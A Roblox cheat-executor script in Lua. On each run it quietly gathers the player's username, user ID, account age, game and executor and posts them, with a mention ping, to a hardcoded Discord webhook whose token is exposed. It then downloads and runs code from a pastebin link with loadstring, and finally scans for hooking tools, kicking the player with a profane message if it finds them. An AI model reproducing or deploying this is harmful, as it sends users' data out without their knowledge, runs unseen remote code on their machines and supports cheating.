local Webhook = "https://discord.com/api/webhooks/1044988003778580620/UKMShpokGA1iNjuCIF6mwp8SyRkJdcTyDMcP0Gj4jyKnVDeMJnLMoDmRIaYnm4E18zZ6" -- your webhook
_G.Discord_UserID = "654054638143930368" -- ID To Ping on every execution, blank if no one wants to be pinged.

local player = game:GetService"Players".LocalPlayer
local joinTime = os.time() - (player.AccountAge*86400)
local joinDate = os.date("!*t", joinTime)
local premium = false
local alt = true
if player.MembershipType == Enum.MembershipType.Premium then
   premium = true
end

if not premium and player.AccountAge >= 70 then
    alt = "Possible"
elseif premium and player.AccountAge >= 70 then
   alt = false
end

local executor = identifyexecutor() or "Other Executors"
local Thing = game:HttpGet(string.format("https://thumbnails.roblox.com/v1/users/avatar?userIds=%d&size=180x180&format=Png&isCircular=true", game.Players.LocalPlayer.UserId))
Thing = game:GetService("HttpService"):JSONDecode(Thing).data[1]
local AvatarImage = Thing.imageUrl
local msg = {
   ["username"] = "Script Webhook",
   ["avatar_url"] = "https://cdn.discordapp.com/attachments/868496249958060102/901884186267365396/ezgif-2-3c2a2bc53af1.gif",
   ["content"] = ( _G.Discord_UserID ~= "" and  _G.Discord_UserID ~= nil) and tostring("<@".._G.Discord_UserID..">") or " ",
   ["embeds"] = {
       {
           ["color"] = tonumber(tostring("0x32CD32")), --decimal
           ["title"] = "Someone Has Succesfully Executed The Script!",
           ["thumbnail"] = {
               ["url"] = AvatarImage,
           },
           ["fields"] = {
                {
                   ["name"] = "Username:",
                   ["value"] = ""..player.Name.."",
                   ["inline"] = true
                },
                {
                   ["name"] = "Display Name:",
                   ["value"] = player.DisplayName,
                   ["inline"] = true
                },
                {
                   ["name"] = "User ID:",
                   ["value"] = "["..player.UserId.."](" .. tostring("https://www.roblox.com/users/" .. game.Players.LocalPlayer.UserId .. "/profile")..")",
                   ["inline"] = true
                },
                {
                   ["name"] = "Game ID:",
                   ["value"] = "["..game.PlaceId.."](" .. tostring("https://www.roblox.com/games/" .. game.PlaceId) ..")",
                   ["inline"] = true
                },
                {
                   ["name"] = "Game Name:",
                   ["value"] = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name,
                   ["inline"] = true
                },
                {
                   ["name"] = "Executor Used:",
                   ["value"] = executor,
                   ["inline"] = true
                },
                {
                   ["name"] = "Alt:",
                   ["value"] = alt,
                   ["inline"] = true
                },
                {
                   ["name"] = "Account Age:",
                   ["value"] = player.AccountAge.."day(s)",
                   ["inline"] = true
                },
                {
                   ["name"] = "Date Joined:",
                   ["value"] = joinDate.day.."/"..joinDate.month.."/"..joinDate.year,
                   ["inline"] = true
                },
           },
           ['timestamp'] = os.date("%Y-%m-%dT%X.000Z")
       }
   }
}


    request = http_request or request or HttpPost or syn.request
    request({Url = Webhook, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = game.HttpService:JSONEncode(msg)})

loadstring(game:HttpGet("https://pastebin.com/raw/fNrPN9r1"))()

local GCI = 0;
local SF = 0;
local PCC = 0;
local ALH = 0;

local GCRegister = function(C)
    if tostring(C) == 'hookfunction' then
        ALH = ALH + 1
        if ALH >= 3 then
            game.Players.LocalPlayer:Kick("Fuck you")
        end
    end
end

while true do
    GCI = GCI + 1
    if getgc()[GCI] == nil then break; end
    local GCF = getgc()[GCI]
    local FC = false;
    if is_synapse_function(GCF) then
        SF = SF + 1
        local CPC = pcall(function() getconstants(GCF) end)
        local CPCD = pcall(function() debug.getconstants(GCF) end)
        if CPC or CPCD then
            PCC = PCC + 1
            local GCC = 0;
            while true do
                if #getconstants(GCF) == GCC or #getconstants(GCF) == GCC then break; end
                GCC = GCC + 1
                local C = CPC and getconstants(GCF)[GCC] or debug.getconstants(GCF)[GCC]
                GCRegister(C)
            end
        end
    end
end

if SF < 300 or GCI < 2000 or PCC < 100 or ALH >= 3 then
    game.Players.LocalPlayer:Kick("Fuck you")
end
